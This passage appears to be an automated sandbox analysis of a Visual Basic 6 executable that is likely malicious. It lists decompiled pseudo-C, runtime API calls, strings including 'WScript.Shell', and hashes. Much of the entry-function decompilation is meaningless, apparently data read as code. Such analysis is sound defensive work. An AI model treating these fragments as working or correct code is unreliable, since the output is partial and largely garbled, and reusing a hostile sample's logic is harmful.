					_push(0x9ae);
					L0040169C();
					L0040183A();
					_push(L"Propreste7");
					_push(L"Desorganisationens");
					L00401696();
					L0040183A();
				}
				_push(0x41ec76);
				L00401846();
				L004017C2();
				L00401846();
				L00401846();
				return _t35;
			}

0x0041eb52
0x0041eb5d
0x0041eb5e
0x0041eb65
0x0041eb68
0x0041eb70
0x0041eb73
0x0041eb80
0x0041eb85
0x0041eb87
0x0041eb8f
0x0041eb90
0x0041eb95
0x0041eb98
0x0041eb99
0x0041eb9e
0x0041eba2
0x0041eba3
0x0041ebab
0x0041ebb0
0x0041ebb7
0x0041ebbe
0x0041ebc2
0x0041ebc9
0x0041ebcc
0x0041ebd6
0x0041ebd7
0x0041ebd8
0x0041ebd9
0x0041ebda
0x0041ebdc
0x0041ebe1
0x0041ebe4
0x0041ebe7
0x0041ebe8
0x0041ebf0
0x0041ebf1
0x0041ebf4
0x0041ebf5
0x0041ebfa
0x0041ec01
0x0041ec06
0x0041ec0c
0x0041ec0e
0x0041ec13
0x0041ec1d
0x0041ec22
0x0041ec27
0x0041ec2c
0x0041ec36
0x0041ec36
0x0041ec3b
0x0041ec58
0x0041ec60
0x0041ec68
0x0041ec70
0x0041ec75

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EB68
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EB80
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EB90
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EB99
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EBA3
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EBAB
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041EBCC
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041EBE8
__vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041EBF5
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041EC01
#697.MSVBVM60(000009AE,?,00000000), ref: 0041EC13
__vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041EC1D
__vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041EC2C
__vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041EC36
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC58
__vbaFreeObj.MSVBVM60(0041EC76,?,00000000), ref: 0041EC60
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC68
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC70

Strings

Desorganisationens, xrefs: 0041EC27
Gulsoterne, xrefs: 0041EBB0
FolderExists, xrefs: 0041EBDC
Scripting.FileSystemObject, xrefs: 0041EB87
Propreste7, xrefs: 0041EC22

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
API String ID: 3773181626-3836659718
Opcode ID: 9d008f0baa8c66aeb9fb300bc59f48f05a7363c37ee1349b110dc43dbf328600
Instruction ID: eb56394621d30b47d1e7f0c1fe64527459e02528fbb533b5cfa1a86cf3aef07b
Opcode Fuzzy Hash: 9d008f0baa8c66aeb9fb300bc59f48f05a7363c37ee1349b110dc43dbf328600
Instruction Fuzzy Hash: C4312B71910218ABDB14EBA2CD86FEE7778AF11708F60453FB101770E2EBBD5A458B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042142C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0042142C(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long long* _v28;
				char _v40;
				char _v44;
				char _v60;
				char* _t18;
				char* _t20;
				char* _t22;
				void* _t31;
				long long* _t32;

				_t32 = _t31 - 0x18;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t32;
				_t18 = 0x2c;
				L00401540();
				_v28 = _t32;
				_v24 = 0x4014e0;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				_t22 =  &_v40;
				L004017B6();
				_v8 = 2;
				_push(_t22);
				_push(_t22);
				 *_t32 =  *0x401520;
				L004015D6();
				L004015DC();
				asm("fcomp qword [0x401518]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags < 0) {
					_v8 = 3;
					_push(0xffffffff);
					L004016E4();
					_v8 = 4;
					_push(0);
					_push(L"WScript.Shell");
					_push( &_v60); // executed
					L004016F0(); // executed
					_t20 =  &_v60;
					_push(_t20);
					L004016F6();
					_push(_t20);
					_t18 =  &_v44;
					_push(_t18);
					L004016FC();
					L00401828();
				}
				asm("wait");
				_push(0x421503);
				L00401846();
				L004017C2();
				return _t18;
			}

0x0042142f
0x00421432
0x0042143d
0x0042143e
0x00421447
0x00421448
0x00421450
0x00421453
0x0042145a
0x00421461
0x00421468
0x00421472
0x00421475
0x0042147a
0x00421487
0x00421488
0x00421489
0x0042148c
0x00421491
0x00421496
0x0042149c
0x0042149e
0x0042149f
0x004214a1
0x004214a8
0x004214aa
0x004214af
0x004214b6
0x004214b8
0x004214c0
0x004214c1
0x004214c6
0x004214c9
0x004214ca
0x004214cf
0x004214d0
0x004214d3
0x004214d4
0x004214dc
0x004214dc
0x004214e1
0x004214e2
0x004214f5
0x004214fd
0x00421502

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421448
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00421475
#582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042148C
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00421491
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004214AA
#716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214C1
__vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214CA
__vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214D4
__vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214DC
__vbaFreeStr.MSVBVM60(00421503,?,?,?,?,?,?,00401546), ref: 004214F5
__vbaFreeObj.MSVBVM60(00421503,?,?,?,?,?,?,00401546), ref: 004214FD

Strings

WScript.Shell, xrefs: 004214B8

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#582#716AddrefChkstkCopyError
String ID: WScript.Shell
API String ID: 2682307056-813827646
Opcode ID: a8f43f8d449fea691a2801efe6c89318294af06d3ecf90b1915a406576d64272
Instruction ID: 7982085fe91bb987341f93e765445301efc6d1d96112fe3bd4a9835da013b008
Opcode Fuzzy Hash: a8f43f8d449fea691a2801efe6c89318294af06d3ecf90b1915a406576d64272
Instruction Fuzzy Hash: E4110DB1900208BBDB10EFA1DD46BDEBBB8AB44708F50456EF101761E1DBBD5A448B98

Uniqueness

Uniqueness Score: -1.00%

Function 00421516, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00421516(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L00401540();
				_v12 = _t76;
				_v8 = 0x401528;
				L004016FC();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401546, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x402310);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004016FC();
				L004015D0();
				_v28 = E00421757( &_v36);
				L004017C2();
				_v32 = E00421757(_v28) + 0x2b0;
				E00421827(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x402310);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v88 = _t62;
				}
				_push(0x421659);
				L004017C2();
				return _t62;
			}

0x00421516
0x00421527
0x00421531
0x00421539
0x0042153c
0x0042154a
0x0042155b
0x0042155e
0x00421560
0x00421567
0x00421580
0x00421569
0x00421569
0x0042156b
0x00421570
0x00421573
0x00421576
0x0042157b
0x0042157b
0x00421587
0x00421591
0x0042159a
0x004215a5
0x004215ab
0x004215bd
0x004215c6
0x004215cb
0x004215d2
0x004215d9
0x004215e0
0x004215ea
0x004215f4
0x004215f5
0x004215f6
0x004215f7
0x004215fb
0x00421605
0x00421606
0x00421607
0x00421608
0x00421611
0x00421617
0x00421619
0x00421620
0x0042163c
0x00421622
0x00421622
0x00421627
0x0042162c
0x0042162f
0x00421632
0x00421637
0x00421637
0x00421640
0x00421653
0x00421658

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421531
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042154A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402310,00000058), ref: 00421576
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00421591
#644.MSVBVM60(?,?,?), ref: 0042159A
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004215AB
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004215EA
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004215FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402310,000002B0), ref: 00421632
__vbaFreeObj.MSVBVM60(00421659), ref: 00421653

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: 08cb90e36ea02506d91524a46d753a20ddf52da15bd5bc5c572393c4554f65e0
Instruction ID: e07db963fa73634f9fc6910f5233b6cd176df257759dfbc213d863687aa02990
Opcode Fuzzy Hash: 08cb90e36ea02506d91524a46d753a20ddf52da15bd5bc5c572393c4554f65e0
Instruction Fuzzy Hash: A7415771900218AFCF01EF91CC46BDEBBB5FF14344F10042AF901BB1A1C7B999858B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 79%

			_entry_(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a668185540) {
				intOrPtr _v12;
				char _v24;
				signed int _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				char _v64;
				char _v80;
				char _v96;
				char* _v104;
				char _v112;
				char* _v120;
				char _v128;
				void* _v148;
				signed int* _v152;
				signed int _v156;
				signed int* _v160;
				signed int _v164;
				signed int _v168;
				signed int* _v172;
				signed int _v176;
				signed int _v180;
				char _v810808286;
				intOrPtr* _t236;

				_push("VB5!6&*"); // executed
				L00401882(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t236 = __eax + 1;
				 *_t236 =  *_t236 + _t236;
				 *_t236 =  *_t236 + _t236;
				 *_t236 =  *_t236 + _t236;
				_t1 = __esi + 0x6c9b95c0;
				 *_t1 =  *((intOrPtr*)(__esi + 0x6c9b95c0)) + __edx;
				if( *_t1 <= 0) {
					return __imp__#713();
				}
				__eax = __eax - 1;
				asm("movsb");
				__esp = __esp ^ __ebp;
				__al = __al + 0x17;
				_t3 = __eax;
				__eax =  *__ebx;
				 *__ebx = _t3;
				_t4 = __eax;
				__eax =  *__eax;
				 *__eax = _t4;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__ecx =  *__ecx + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				__eflags =  *__eax;
				while(1) {
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__eflags =  *__eax;
					_push(__eax);
					asm("outsd");
					if(__eflags >= 0) {
						break;
					}
					if(__eflags < 0) {
						__ebp =  *(__edi + 0x6e) * 0x73;
						 *__eax =  *__eax + __al;
						 *__eax =  *__eax + __al;
						 *__eax =  *__eax + __al;
						__esp = __esp - 1;
						 *__eax =  *__eax ^ __eax;
						_a668185540 = _a668185540 + __bh;
						asm("sahf");
						__eax = __eax + 1;
						_t8 =  &_v810808286;
						__ebp =  *_t8;
						 *_t8 =  *(__edi + 0x6e) * 0x73;
						asm("das");
						__eflags = __ch -  *((intOrPtr*)(__ebx + 0x29a901e3));
						if(__ch <  *((intOrPtr*)(__ebx + 0x29a901e3))) {
							continue;
						} else {
							__edi = __edi + 1;
							__eflags = __edi;
							_t11 = __eax;
							__eax = __edx;
							__edx = _t11;
							if(__edi >= 0) {
								__fp0 = __fp0 - __ecx[0xe9684f1];
							}
							__eax =  *0x3a5a13c6;
							__edi = __edi - 1;
							asm("lodsd");
							__ebx = __ebx ^  *(__ecx - 0x48ee309a);
							asm("stosb");
							 *((intOrPtr*)(__eax - 0x2d)) =  *((intOrPtr*)(__eax - 0x2d)) + __ah;
							_t16 = __eax;
							__eax = __ebx;
							__ebx = _t16;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							_push(__esi);
							 *__eax =  *__eax + __al;
							 *__ecx =  *__ecx + __dl;
							 *__eax =  *__eax + __al;
							 *__edi =  *__edi + __al;
							__eflags =  *__edi;
							break;
						}
					}
					L10:
					asm("popad");
					if(__eflags != 0) {
						asm("popad");
						asm("insb");
						 *0x4a000f01 =  *0x4a000f01 + __cl;
						asm("outsd");
						asm("bound ebp, [ebp+0x75]");
						asm("insb");
						__esp =  *(__edi + 0x68) * 0x6e656465;
						__eflags = __esp;
						if(__esp >= 0) {
							L14:
							 *__ecx =  *__ecx + __al;
							 *__edx =  *__edx + __al;
							 *((intOrPtr*)(__eax + 0x4021)) =  *((intOrPtr*)(__eax + 0x4021)) + __ah;
							 *__eax =  *__eax + __al;
							__bh = __bh + __bh;
							asm("invalid");
							asm("invalid");
							asm("invalid");
							 *__eax =  *__eax + 1;
							 *__eax =  *__eax + __al;
							__eflags =  *__eax;
						} else {
							 *__ecx =  *__ecx + __bl;
							 *__eax =  *__eax + __eax;
							__edx = __edx + 1;
							 *((intOrPtr*)(__ecx + __edi)) =  *((intOrPtr*)(__ecx + __edi)) + __ah;
							 *((intOrPtr*)(__edx + 0x6f)) =  *((intOrPtr*)(__edx + 0x6f)) + __cl;
							asm("bound ebp, [ebp+0x75]");
							asm("insb");
							__esp =  *(__edi + 0x68) * 0x6e656465;
							__eflags = __esp;
							if(__esp < 0) {
								 *0x161c =  *0x161c + __dh;
								_push(ss);
								asm("sldt word [eax]");
								__eax = __eax + 0xb400001b;
								asm("sbb eax, 0x440000");
								__esi = __esi + 1;
								__edi = __edi + __edi;
								__al = __al;
								_push(es);
								 *__eax =  *__eax + __al;
								_t25 = __eax + 0x1004031;
								 *_t25 =  *(__eax + 0x1004031) + __ah;
								__eflags =  *_t25;
								goto L14;
							}
						}
						_t29 = __edx + 0x40;
						 *_t29 =  *(__edx + 0x40) + __dl;
						__eflags =  *_t29;
					}
					__al = __al &  *__eax;
					asm("sbb al, 0x20");
					__edx = __edx + 1;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __dh;
					asm("fst qword [ecx]");
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__al = __al + __cl;
					asm("sbb [eax], eax");
					_push(__esi);
					__edx = __edx + 1;
					__eax = __eax ^ 0x2a263621;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__esi =  *__esi + __bh;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__al = __al |  *__eax;
					__al = __al + 4;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__al = 0x1c;
					__eax = __eax + 1;
					 *__eax =  *__eax + 0x1c;
					asm("lock xor [ecx], al");
					__bh = __bh + __bh;
					asm("invalid");
					 *__eax =  *__eax | 0x0000001c;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + __eax;
					 *__eax =  *__eax + 0x1c;
					__eflags =  *__eax;
					__al = 0x1c +  *__eax;
					 *__eax =  *__eax + 0x1c;
					goto 0x60401a15;
					asm("sbb al, [eax]");
					 *__ecx = __bl;
					__eax = __eax + 1;
					 *((intOrPtr*)(__eax + __ebx + 0x780040)) =  *((intOrPtr*)(__eax + __ebx + 0x780040)) + __dl;
					 *__eax =  *__eax + 0x1c;
					__eflags =  *__eax;
					if ( *__eax > 0) goto L18;
					 *__eax =  *__eax + 0x1c;
					__eax =  *__eax;
					 *__eax =  *__eax + 0x1c;
					 *__eax = es;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + 0x1c;
					 *__eax =  *__eax + 0x1c;
					__eflags =  *__eax;
					_push(__ebx);
					asm("insb");
					if( *__eax >= 0) {
						L25:
						_push(__eax);
						 *__eax =  *__eax + __al;
						 *0x425b48b0 =  *0x425b48b0 + __dl;
						__eflags =  *0x425b48b0;
						asm("outsd");
						return __eax;
					} else {
						__eflags =  *__eax - 0x1c;
						_push(__eax);
						asm("outsd");
						if(__eflags >= 0) {
							 *0x8a57c7e8 = 0x1c;
							goto L27;
						} else {
							if(__eflags >= 0) {
								L27:
								_push(__edi);
								__ah =  *__ecx;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
								goto L28;
							} else {
								__ebp =  *(__edi + 0x6e) * 0x50000073;
								__eflags = __ebp;
								asm("outsd");
								if(__eflags >= 0) {
									L28:
									 *__eax =  *__eax + __al;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
									goto L29;
								} else {
									if(__eflags >= 0) {
										L29:
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __eax;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										__ch = __ch + __dh;
										__eax =  *__ecx;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__esp + __esi + 0x9c0040)) =  *((intOrPtr*)(__esp + __esi + 0x9c0040)) + __bh;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __eax;
										 *__eax =  *__eax + __eax;
										__al =  *0x4021;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__ebx + __eax * 8)) =  *((intOrPtr*)(__ebx + __eax * 8)) + __dh;
										__ecx =  &(__ecx[0]);
										__bh = __bh + __bh;
										asm("invalid");
										 *__eax =  *__eax + 1;
										 *__eax =  *__eax + __al;
										 *__edx =  *__edx + __ah;
										__eax = __eax + 1;
										 *((intOrPtr*)(__eax + 0x42)) =  *((intOrPtr*)(__eax + 0x42)) + __cl;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x9353)) =  *((intOrPtr*)(__eax + 0x9353)) + __ch;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x1b)) =  *((intOrPtr*)(__eax + 0x1b)) + __bh;
										__eax = __eax + 1;
										 *__ecx =  *__ecx + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x34)) =  *((intOrPtr*)(__eax + 0x34)) + __ch;
										__eax = __eax + 1;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x1b)) =  *((intOrPtr*)(__eax + 0x1b)) + __bh;
										__eax = __eax + 1;
										 *__ecx =  *__ecx + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x401b)) =  *((intOrPtr*)(__eax + 0x401b)) + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__ebx + __ebx + 0x40)) =  *((intOrPtr*)(__ebx + __ebx + 0x40)) + __bh;
										 *__edx =  *__edx + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x401b)) =  *((intOrPtr*)(__eax + 0x401b)) + __al;
										 *((intOrPtr*)(__edi + 0x6c006801)) =  *((intOrPtr*)(__edi + 0x6c006801)) + __dh;
										__al = __al + __dl;
										asm("sbb eax, [eax]");
										asm("int3");
										__eax = __eax &  *__edx;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										__eflags =  *__eax;
										if( *__eax >= 0) {
											_t69 = __eax;
											__eax = __edi;
											__edi = _t69;
											 *((intOrPtr*)(__eax + 0x34)) =  *((intOrPtr*)(__eax + 0x34)) + __bh;
											__eax = __eax + 1;
											 *((intOrPtr*)(__eax + 0x40004034)) =  *((intOrPtr*)(__eax + 0x40004034)) + __cl;
											 *0x3400 =  *0x3400 + __cl;
											 *((intOrPtr*)(__eax + 0x1004034)) =  *((intOrPtr*)(__eax + 0x1004034)) + __bl;
											 *__ebx =  *__ebx + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											__al = __al + __dl;
											asm("sbb eax, [eax]");
										}
										0xa840b25b();
										__al = __al ^ 0x00000040;
										 *__ecx =  *__ecx + __al;
										 *__ebx =  *__ebx + __al;
										 *__eax =  *__eax + __al;
										_pop(ds);
										 *__eax =  *__eax + __bh;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x23)) =  *((intOrPtr*)(__eax + 0x23)) + __dl;
										__eax = __eax + 1;
										__bh = __bh + __bh;
										asm("invalid");
										 *__eax =  *__eax + 1;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__esp + __ebx)) =  *((intOrPtr*)(__esp + __ebx)) + __bl;
										__eax = __eax + 1;
										 *((intOrPtr*)(__eax + 0x6000940e)) =  *((intOrPtr*)(__eax + 0x6000940e)) + __bl;
										__eax = __eax &  *__eax;
										asm("invalid");
										asm("invalid");
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										asm("sbb byte [ebx], 0x40");
										 *__eax =  *__eax + __al;
										__eflags =  *__eax;
										asm("sbb eax, [eax]");
										if( *__eax >= 0) {
											__eax = __eax + 1;
											 *((intOrPtr*)(__esi + 0x18)) =  *((intOrPtr*)(__esi + 0x18)) + __dh;
											__eax = __eax + 1;
											 *((intOrPtr*)(__eax + __ebx + 0x40)) =  *((intOrPtr*)(__eax + __ebx + 0x40)) + __bh;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
										}
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										__eflags = __al & 0x0000001b;
										__eax = __eax + 1;
										 *__eax =  *__eax + __al;
										__eflags =  *__eax;
										asm("sbb eax, [eax]");
										if( *__eax >= 0) {
											__eax = __eax + 1;
											 *((intOrPtr*)(__esi + 0x18)) =  *((intOrPtr*)(__esi + 0x18)) + __dh;
											__eax = __eax + 1;
											 *((intOrPtr*)(__eax + __ebx + 0x40)) =  *((intOrPtr*)(__eax + __ebx + 0x40)) + __bh;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
										}
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
